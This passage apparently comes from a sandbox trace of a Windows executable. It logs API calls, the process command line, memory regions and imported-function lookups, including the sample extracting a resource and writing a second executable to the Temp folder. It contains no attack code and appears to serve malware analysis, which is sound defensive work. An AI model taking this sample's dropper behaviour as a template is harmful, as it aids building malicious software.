!\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ") returned 256 [0298.384] WideCharToMultiByte (in: CodePage=0x4e4, dwFlags=0x0, lpWideCharStr=" \x01\x02\x03\x04\x05\x06\x07\x08\x09\n\x0b\x0c\r\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f !\"#$%&'()*+,-./0123456789:;<=>?@ABCDEFGHIJKLMNOPQRSTUVWXYZ[\\]^_`ABCDEFGHIJKLMNOPQRSTUVWXYZ{|}~\x7f€\x81‚Ƒ„…†‡ˆ‰Š‹Œ\x8dŽ\x8f\x90‘’“”•–—˜™Š›Œ\x9dŽŸ ¡¢£¤¥¦§¨©ª«¬­®¯°±²³´µ¶·¸¹º»¼½¾¿ÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ×ØÙÚÛÜÝÞßÀÁÂÃÄÅÆÇÈÉÊËÌÍÎÏÐÑÒÓÔÕÖ÷ØÙÚÛÜÝÞŸȀ", cchWideChar=256, lpMultiByteStr=0x19fba0, cbMultiByte=256, lpDefaultChar=0x0, lpUsedDefaultChar=0x0 | out: lpMultiByteStr="\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x8a\x9b\x8c\x9d\x8e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xf7\xd8\xd9\xda\xdb\xdc\xdd\xde\x9f\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x9a\x8b\x9c\x8d\x9e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\xff\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xd7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x20\x01\x02\x03\x04\x05\x06\x07\x08\x09\x0a\x0b\x0c\x0d\x0e\x0f\x10\x11\x12\x13\x14\x15\x16\x17\x18\x19\x1a\x1b\x1c\x1d\x1e\x1f\x20\x21\x22\x23\x24\x25\x26\x27\x28\x29\x2a\x2b\x2c\x2d\x2e\x2f\x30\x31\x32\x33\x34\x35\x36\x37\x38\x39\x3a\x3b\x3c\x3d\x3e\x3f\x40\x41\x42\x43\x44\x45\x46\x47\x48\x49\x4a\x4b\x4c\x4d\x4e\x4f\x50\x51\x52\x53\x54\x55\x56\x57\x58\x59\x5a\x5b\x5c\x5d\x5e\x5f\x60\x61\x62\x63\x64\x65\x66\x67\x68\x69\x6a\x6b\x6c\x6d\x6e\x6f\x70\x71\x72\x73\x74\x75\x76\x77\x78\x79\x7a\x7b\x7c\x7d\x7e\x7f\x80\x81\x82\x83\x84\x85\x86\x87\x88\x89\x8a\x8b\x8c\x8d\x8e\x8f\x90\x91\x92\x93\x94\x95\x96\x97\x98\x99\x9a\x9b\x9c\x9d\x9e\x9f\xa0\xa1\xa2\xa3\xa4\xa5\xa6\xa7\xa8\xa9\xaa\xab\xac\xad\xae\xaf\xb0\xb1\xb2\xb3\xb4\xb5\xb6\xb7\xb8\xb9\xba\xbb\xbc\xbd\xbe\xbf\xc0\xc1\xc2\xc3\xc4\xc5\xc6\xc7\xc8\xc9\xca\xcb\xcc\xcd\xce\xcf\xd0\xd1\xd2\xd3\xd4\xd5\xd6\xd7\xd8\xd9\xda\xdb\xdc\xdd\xde\xdf\xe0\xe1\xe2\xe3\xe4\xe5\xe6\xe7\xe8\xe9\xea\xeb\xec\xed\xee\xef\xf0\xf1\xf2\xf3\xf4\xf5\xf6\xf7\xf8\xf9\xfa\xfb\xfc\xfd\xfe\xff\x99\x3a\xde\x53\xdc\xfe\x19", lpUsedDefaultChar=0x0) returned 256 [0298.384] IsProcessorFeaturePresent (ProcessorFeature=0xa) returned 1 [0298.384] SetUnhandledExceptionFilter (lpTopLevelExceptionFilter=0x40f584) returned 0x0 [0298.384] GetModuleHandleW (lpModuleName="kernel32.dll") returned 0x75130000 [0298.385] GetProcAddress (hModule=0x75130000, lpProcName="IsWow64Process") returned 0x751496e0 [0298.385] GetCurrentProcess () returned 0xffffffff [0298.385] IsWow64Process (in: hProcess=0xffffffff, Wow64Process=0x19ff2c | out: Wow64Process=0x19ff2c) returned 1 [0298.385] GetModuleFileNameW (in: hModule=0x0, lpFilename=0x19fd20, nSize=0x104 | out: lpFilename="C:\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe")) returned 0x2a [0298.385] ExpandEnvironmentStringsW (in: lpSrc="%TEMP%", lpDst=0x19fb18, nSize=0x104 | out: lpDst="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp") returned 0x25 [0298.385] FindResourceW (hModule=0x0, lpName="RCHANDLE64", lpType="BINRES") returned 0x476060 [0298.385] LoadResource (hModule=0x0, hResInfo=0x476060) returned 0x43c648 [0298.385] SizeofResource (hModule=0x0, hResInfo=0x476060) returned 0x37490 [0298.385] LockResource (hResData=0x43c648) returned 0x43c648 [0298.385] GetCurrentPackageId () returned 0x3d54 [0298.385] CreateFileW (lpFileName="C:\\Users\\CIIHMN~1\\AppData\\Local\\Temp\\vIDhS3md64.exe" (normalized: "c:\\users\\ciihmn~1\\appdata\\local\\temp\\vidhs3md64.exe"), dwDesiredAccess=0x40000000, dwShareMode=0x0, lpSecurityAttributes=0x19f954, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0298.460] GetLastError () returned 0x20 [0298.460] GetLastError () returned 0x20 [0298.460] SetLastError (dwErrCode=0x20) [0298.460] GetLastError () returned 0x20 [0298.460] SetLastError (dwErrCode=0x20) [0298.460] GetLastError () returned 0x20 [0298.460] SetLastError (dwErrCode=0x20) [0298.460] GetLastError () returned 0x20 [0298.460] SetLastError (dwErrCode=0x20) [0298.460] GetLastError () returned 0x20 [0298.460] SetLastError (dwErrCode=0x20) [0298.460] GetLastError () returned 0x20 [0298.460] SetLastError (dwErrCode=0x20) [0298.460] WriteFile (in: hFile=0xc0, lpBuffer=0x19ea00*, nNumberOfBytesToWrite=0x49, lpNumberOfBytesWritten=0x19e32c, lpOverlapped=0x0 | out: lpBuffer=0x19ea00*, lpNumberOfBytesWritten=0x19e32c*=0x49, lpOverlapped=0x0) returned 1 [0298.461] GetModuleHandleExW (in: dwFlags=0x0, lpModuleName="mscoree.dll", phModule=0x19fed4 | out: phModule=0x19fed4) returned 0 [0298.461] ExitProcess (uExitCode=0x1) Thread: id = 1011 os_tid = 0xcd4 Process: id = "149" image_name = "vidhs3md.exe" filename = "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe" page_root = "0x78972000" os_pid = "0xcb4" os_integrity_level = "0x3000" os_privileges = "0x60800000" monitor_reason = "child_process" parent_id = "143" os_parent_pid = "0xc54" cmd_line = "vIDhS3md.exe -accepteula \"expenditurevincenttablet.exe\" -nobanner" cur_dir = "C:\\Users\\CIiHmnxMn6Ps\\Desktop\\" os_username = "LHNIWSJ\\CIiHmnxMn6Ps" os_groups = "LHNIWSJ\\Domain Users" [0x7], "Everyone" [0x7], "NT AUTHORITY\\Local account and member of Administrators group" [0x7], "BUILTIN\\Administrators" [0xf], "BUILTIN\\Users" [0x7], "NT AUTHORITY\\INTERACTIVE" [0x7], "CONSOLE LOGON" [0x7], "NT AUTHORITY\\Authenticated Users" [0x7], "NT AUTHORITY\\This Organization" [0x7], "NT AUTHORITY\\Local account" [0x7], "NT AUTHORITY\\Logon Session 00000000:00013c81" [0xc0000007], "LOCAL" [0x7], "NT AUTHORITY\\NTLM Authentication" [0x7] Region: id = 10232 start_va = 0x10000 end_va = 0x2ffff entry_point = 0x0 region_type = private name = "private_0x0000000000010000" filename = "" Region: id = 10233 start_va = 0x30000 end_va = 0x31fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10234 start_va = 0x40000 end_va = 0x53fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000040000" filename = "" Region: id = 10235 start_va = 0x60000 end_va = 0x9ffff entry_point = 0x0 region_type = private name = "private_0x0000000000060000" filename = "" Region: id = 10236 start_va = 0xa0000 end_va = 0x19ffff entry_point = 0x0 region_type = private name = "private_0x00000000000a0000" filename = "" Region: id = 10237 start_va = 0x1a0000 end_va = 0x1a3fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001a0000" filename = "" Region: id = 10238 start_va = 0x400000 end_va = 0x476fff entry_point = 0x400000 region_type = mapped_file name = "vidhs3md.exe" filename = "\\Users\\CIiHmnxMn6Ps\\Desktop\\vIDhS3md.exe" (normalized: "c:\\users\\ciihmnxmn6ps\\desktop\\vidhs3md.exe") Region: id = 10239 start_va = 0x77990000 end_va = 0x77b08fff entry_point = 0x77990000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\SysWOW64\\ntdll.dll" (normalized: "c:\\windows\\syswow64\\ntdll.dll") Region: id = 10240 start_va = 0x7ffb0000 end_va = 0x7ffd2fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007ffb0000" filename = "" Region: id = 10241 start_va = 0x7ffdb000 end_va = 0x7ffddfff entry_point = 0x0 region_type = private name = "private_0x000000007ffdb000" filename = "" Region: id = 10242 start_va = 0x7ffde000 end_va = 0x7ffdefff entry_point = 0x0 region_type = private name = "private_0x000000007ffde000" filename = "" Region: id = 10243 start_va = 0x7ffdf000 end_va = 0x7ffdffff entry_point = 0x0 region_type = private name = "private_0x000000007ffdf000" filename = "" Region: id = 10244 start_va = 0x7ffe0000 end_va = 0x7ffeffff entry_point = 0x0 region_type = private name = "private_0x000000007ffe0000" filename = "" Region: id = 10245 start_va = 0x7fff0000 end_va = 0x7ffaf7a0ffff entry_point = 0x0 region_type = private name = "private_0x000000007fff0000" filename = "" Region: id = 10246 start_va = 0x7ffaf7a10000 end_va = 0x7ffaf7bd1fff entry_point = 0x7ffaf7a10000 region_type = mapped_file name = "ntdll.dll" filename = "\\Windows\\System32\\ntdll.dll" (normalized: "c:\\windows\\system32\\ntdll.dll") Region: id = 10247 start_va = 0x7ffaf7bd2000 end_va = 0x7ffffffeffff entry_point = 0x0 region_type = private name = "private_0x00007ffaf7bd2000" filename = "" Region: id = 10248 start_va = 0x1b0000 end_va = 0x1b0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000001b0000" filename = "" Region: id = 10249 start_va = 0x1c0000 end_va = 0x1c1fff entry_point = 0x0 region_type = private name = "private_0x00000000001c0000" filename = "" Region: id = 10279 start_va = 0x2e0000 end_va = 0x2effff entry_point = 0x0 region_type = private name = "private_0x00000000002e0000" filename = "" Region: id = 10280 start_va = 0x73040000 end_va = 0x7308efff entry_point = 0x73040000 region_type = mapped_file name = "wow64.dll" filename = "\\Windows\\System32\\wow64.dll" (normalized: "c:\\windows\\system32\\wow64.dll") Region: id = 10281 start_va = 0x73090000 end_va = 0x73102fff entry_point = 0x73090000 region_type = mapped_file name = "wow64win.dll" filename = "\\Windows\\System32\\wow64win.dll" (normalized: "c:\\windows\\system32\\wow64win.dll") Region: id = 10282 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10283 start_va = 0x73030000 end_va = 0x73037fff entry_point = 0x73030000 region_type = mapped_file name = "wow64cpu.dll" filename = "\\Windows\\System32\\wow64cpu.dll" (normalized: "c:\\windows\\system32\\wow64cpu.dll") Region: id = 10284 start_va = 0x480000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10285 start_va = 0x75130000 end_va = 0x7521ffff entry_point = 0x75130000 region_type = mapped_file name = "kernel32.dll" filename = "\\Windows\\SysWOW64\\kernel32.dll" (normalized: "c:\\windows\\syswow64\\kernel32.dll") Region: id = 10286 start_va = 0x74d30000 end_va = 0x74ea5fff entry_point = 0x74d30000 region_type = mapped_file name = "kernelbase.dll" filename = "\\Windows\\SysWOW64\\KernelBase.dll" (normalized: "c:\\windows\\syswow64\\kernelbase.dll") Region: id = 10287 start_va = 0x10000 end_va = 0x1ffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000010000" filename = "" Region: id = 10288 start_va = 0x7feb0000 end_va = 0x7ffaffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x000000007feb0000" filename = "" Region: id = 10375 start_va = 0x1d0000 end_va = 0x28dfff entry_point = 0x1d0000 region_type = mapped_file name = "locale.nls" filename = "\\Windows\\System32\\locale.nls" (normalized: "c:\\windows\\system32\\locale.nls") Region: id = 10376 start_va = 0x20000 end_va = 0x23fff entry_point = 0x0 region_type = private name = "private_0x0000000000020000" filename = "" Region: id = 10377 start_va = 0x74c60000 end_va = 0x74cdafff entry_point = 0x74c60000 region_type = mapped_file name = "advapi32.dll" filename = "\\Windows\\SysWOW64\\advapi32.dll" (normalized: "c:\\windows\\syswow64\\advapi32.dll") Region: id = 10378 start_va = 0x778d0000 end_va = 0x7798dfff entry_point = 0x778d0000 region_type = mapped_file name = "msvcrt.dll" filename = "\\Windows\\SysWOW64\\msvcrt.dll" (normalized: "c:\\windows\\syswow64\\msvcrt.dll") Region: id = 10379 start_va = 0x290000 end_va = 0x2cffff entry_point = 0x0 region_type = private name = "private_0x0000000000290000" filename = "" Region: id = 10380 start_va = 0x2f0000 end_va = 0x3effff entry_point = 0x0 region_type = private name = "private_0x00000000002f0000" filename = "" Region: id = 10381 start_va = 0x770b0000 end_va = 0x770f2fff entry_point = 0x770b0000 region_type = mapped_file name = "sechost.dll" filename = "\\Windows\\SysWOW64\\sechost.dll" (normalized: "c:\\windows\\syswow64\\sechost.dll") Region: id = 10382 start_va = 0x7ffd8000 end_va = 0x7ffdafff entry_point = 0x0 region_type = private name = "private_0x000000007ffd8000" filename = "" Region: id = 10383 start_va = 0x772c0000 end_va = 0x7736bfff entry_point = 0x772c0000 region_type = mapped_file name = "rpcrt4.dll" filename = "\\Windows\\SysWOW64\\rpcrt4.dll" (normalized: "c:\\windows\\syswow64\\rpcrt4.dll") Region: id = 10384 start_va = 0x74aa0000 end_va = 0x74abdfff entry_point = 0x74aa0000 region_type = mapped_file name = "sspicli.dll" filename = "\\Windows\\SysWOW64\\sspicli.dll" (normalized: "c:\\windows\\syswow64\\sspicli.dll") Region: id = 10385 start_va = 0x74a90000 end_va = 0x74a99fff entry_point = 0x74a90000 region_type = mapped_file name = "cryptbase.dll" filename = "\\Windows\\SysWOW64\\cryptbase.dll" (normalized: "c:\\windows\\syswow64\\cryptbase.dll") Region: id = 10386 start_va = 0x74a30000 end_va = 0x74a88fff entry_point = 0x74a30000 region_type = mapped_file name = "bcryptprimitives.dll" filename = "\\Windows\\SysWOW64\\bcryptprimitives.dll" (normalized: "c:\\windows\\syswow64\\bcryptprimitives.dll") Region: id = 10387 start_va = 0x74eb0000 end_va = 0x74f6dfff entry_point = 0x74eb0000 region_type = mapped_file name = "comdlg32.dll" filename = "\\Windows\\SysWOW64\\comdlg32.dll" (normalized: "c:\\windows\\syswow64\\comdlg32.dll") Region: id = 10388 start_va = 0x74f70000 end_va = 0x75129fff entry_point = 0x74f70000 region_type = mapped_file name = "combase.dll" filename = "\\Windows\\SysWOW64\\combase.dll" (normalized: "c:\\windows\\syswow64\\combase.dll") Region: id = 10389 start_va = 0x771d0000 end_va = 0x7725cfff entry_point = 0x771d0000 region_type = mapped_file name = "shcore.dll" filename = "\\Windows\\SysWOW64\\SHCore.dll" (normalized: "c:\\windows\\syswow64\\shcore.dll") Region: id = 10390 start_va = 0x74ad0000 end_va = 0x74c0ffff entry_point = 0x74ad0000 region_type = mapped_file name = "user32.dll" filename = "\\Windows\\SysWOW64\\user32.dll" (normalized: "c:\\windows\\syswow64\\user32.dll") Region: id = 10391 start_va = 0x77370000 end_va = 0x774bcfff entry_point = 0x77370000 region_type = mapped_file name = "gdi32.dll" filename = "\\Windows\\SysWOW64\\gdi32.dll" (normalized: "c:\\windows\\syswow64\\gdi32.dll") Region: id = 10392 start_va = 0x74c10000 end_va = 0x74c53fff entry_point = 0x74c10000 region_type = mapped_file name = "shlwapi.dll" filename = "\\Windows\\SysWOW64\\shlwapi.dll" (normalized: "c:\\windows\\syswow64\\shlwapi.dll") Region: id = 10393 start_va = 0x752c0000 end_va = 0x7667efff entry_point = 0x752c0000 region_type = mapped_file name = "shell32.dll" filename = "\\Windows\\SysWOW64\\shell32.dll" (normalized: "c:\\windows\\syswow64\\shell32.dll") Region: id = 10394 start_va = 0x76800000 end_va = 0x76cdcfff entry_point = 0x76800000 region_type = mapped_file name = "windows.storage.dll" filename = "\\Windows\\SysWOW64\\windows.storage.dll" (normalized: "c:\\windows\\syswow64\\windows.storage.dll") Region: id = 10395 start_va = 0x752b0000 end_va = 0x752bbfff entry_point = 0x752b0000 region_type = mapped_file name = "kernel.appcore.dll" filename = "\\Windows\\SysWOW64\\kernel.appcore.dll" (normalized: "c:\\windows\\syswow64\\kernel.appcore.dll") Region: id = 10396 start_va = 0x74ce0000 end_va = 0x74d23fff entry_point = 0x74ce0000 region_type = mapped_file name = "powrprof.dll" filename = "\\Windows\\SysWOW64\\powrprof.dll" (normalized: "c:\\windows\\syswow64\\powrprof.dll") Region: id = 10397 start_va = 0x77100000 end_va = 0x7710efff entry_point = 0x77100000 region_type = mapped_file name = "profapi.dll" filename = "\\Windows\\SysWOW64\\profapi.dll" (normalized: "c:\\windows\\syswow64\\profapi.dll") Region: id = 10433 start_va = 0x74550000 end_va = 0x745e1fff entry_point = 0x74550000 region_type = mapped_file name = "comctl32.dll" filename = "\\Windows\\WinSxS\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll" (normalized: "c:\\windows\\winsxs\\x86_microsoft.windows.common-controls_6595b64144ccf1df_5.82.10240.16384_none_49c02355cf03478c\\comctl32.dll") Region: id = 10434 start_va = 0x74730000 end_va = 0x74737fff entry_point = 0x74730000 region_type = mapped_file name = "version.dll" filename = "\\Windows\\SysWOW64\\version.dll" (normalized: "c:\\windows\\syswow64\\version.dll") Region: id = 10435 start_va = 0x480000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000480000" filename = "" Region: id = 10436 start_va = 0x660000 end_va = 0x75ffff entry_point = 0x0 region_type = private name = "private_0x0000000000660000" filename = "" Region: id = 10437 start_va = 0x480000 end_va = 0x607fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000480000" filename = "" Region: id = 10438 start_va = 0x620000 end_va = 0x62ffff entry_point = 0x0 region_type = private name = "private_0x0000000000620000" filename = "" Region: id = 10439 start_va = 0x630000 end_va = 0x659fff entry_point = 0x630000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10440 start_va = 0x75220000 end_va = 0x7524afff entry_point = 0x75220000 region_type = mapped_file name = "imm32.dll" filename = "\\Windows\\SysWOW64\\imm32.dll" (normalized: "c:\\windows\\syswow64\\imm32.dll") Region: id = 10441 start_va = 0x76da0000 end_va = 0x76ebffff entry_point = 0x76da0000 region_type = mapped_file name = "msctf.dll" filename = "\\Windows\\SysWOW64\\msctf.dll" (normalized: "c:\\windows\\syswow64\\msctf.dll") Region: id = 10442 start_va = 0x760000 end_va = 0x8e0fff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x0000000000760000" filename = "" Region: id = 10443 start_va = 0x8f0000 end_va = 0x1ceffff entry_point = 0x0 region_type = pagefile_backed name = "pagefile_0x00000000008f0000" filename = "" Region: id = 10444 start_va = 0x30000 end_va = 0x30fff entry_point = 0x0 region_type = private name = "private_0x0000000000030000" filename = "" Region: id = 10445 start_va = 0x2d0000 end_va = 0x2d0fff entry_point = 0x0 region_type = private name = "private_0x00000000002d0000" filename = "" Region: id = 10446 start_va = 0x1cf0000 end_va = 0x1dbffff entry_point = 0x0 region_type = private name = "private_0x0000000001cf0000" filename = "" Thread: id = 1007 os_tid = 0xcb8 [0299.023] LoadLibraryA (lpLibFileName="KERNEL32.DLL") returned 0x75130000 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="SetEvent") returned 0x751560c0 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="WaitForSingleObject") returned 0x75156110 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="DeviceIoControl") returned 0x751487e0 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="DuplicateHandle") returned 0x75155f30 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="FormatMessageW") returned 0x75154a40 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="CreateEventW") returned 0x75155fa0 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="CreateProcessW") returned 0x7514a510 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="ExpandEnvironmentStringsW") returned 0x7514c8c0 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="GetDriveTypeW") returned 0x75156300 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="GetSystemDirectoryW") returned 0x75149a90 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="DeleteFileW") returned 0x751561b0 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="SetThreadErrorMode") returned 0x7514fae0 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="HeapSize") returned 0x779e4f40 [0299.024] GetProcAddress (hModule=0x75130000, lpProcName="LCMapStringW") returned 0x75149a40 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="GetStringTypeW") returned 0x751479b0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="TerminateThread") returned 0x7514fcb0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="OpenProcess") returned 0x751492b0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="GetVersion") returned 0x7514a300 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="CreateFileW") returned 0x75156180 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="FindResourceW") returned 0x75153a50 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="SizeofResource") returned 0x75148cb0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="CloseHandle") returned 0x75155f20 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="SetLastError") returned 0x75142af0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="LoadResource") returned 0x751478f0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="GetLastError") returned 0x75142db0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentProcess") returned 0x75142da0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="LockResource") returned 0x75147a50 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="GetCommandLineW") returned 0x7514a4b0 [0299.025] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleW") returned 0x75149660 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryW") returned 0x7514a0b0 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="GetStdHandle") returned 0x7514a060 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="LocalFree") returned 0x751487c0 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="LocalAlloc") returned 0x75148840 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="GetProcAddress") returned 0x75147940 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleFileNameW") returned 0x75149560 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleScreenBufferInfo") returned 0x751569c0 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="GetFileType") returned 0x75156390 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="OutputDebugStringW") returned 0x75171c30 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleW") returned 0x751568e0 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="WriteConsoleW") returned 0x75156920 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="SetFilePointerEx") returned 0x75156540 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="EnterCriticalSection") returned 0x779d5e80 [0299.026] GetProcAddress (hModule=0x75130000, lpProcName="LeaveCriticalSection") returned 0x779d5e00 [0299.027] GetProcAddress (hModule=0x75130000, lpProcName="SetStdHandle") returned 0x751726a0 [0299.027] GetProcAddress (hModule=0x75130000, lpProcName="HeapAlloc") returned 0x779cda90 [0299.027] GetProcAddress (hModule=0x75130000, lpProcName="EncodePointer") returned 0x779ef190 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="DecodePointer") returned 0x779ea200 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="ExitProcess") returned 0x751574f0 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="GetModuleHandleExW") returned 0x75149fa0 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="MultiByteToWideChar") returned 0x75142d60 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="WideCharToMultiByte") returned 0x751475a0 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="HeapFree") returned 0x751425e0 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="GetConsoleMode") returned 0x75156870 [0299.029] GetProcAddress (hModule=0x75130000, lpProcName="ReadConsoleInputA") returned 0x751568c0 [0299.030] GetProcAddress (hModule=0x75130000, lpProcName="SetConsoleMode") returned 0x75156900 [0299.030] GetProcAddress (hModule=0x75130000, lpProcName="CreateThread") returned 0x75149700 [0299.030] GetProcAddress (hModule=0x75130000, lpProcName="GetCurrentThreadId") returned 0x75141b90 [0299.030] GetProcAddress (hModule=0x75130000, lpProcName="ExitThread") returned 0x779f2570 [0299.030] GetProcAddress (hModule=0x75130000, lpProcName="LoadLibraryExW") returned 0x75147920 [0299.030] GetProcAddress (hModule=0x75130000, lpProcName="DeleteCriticalSection") returned 0x779e9920 [0299.030] GetProcAddress 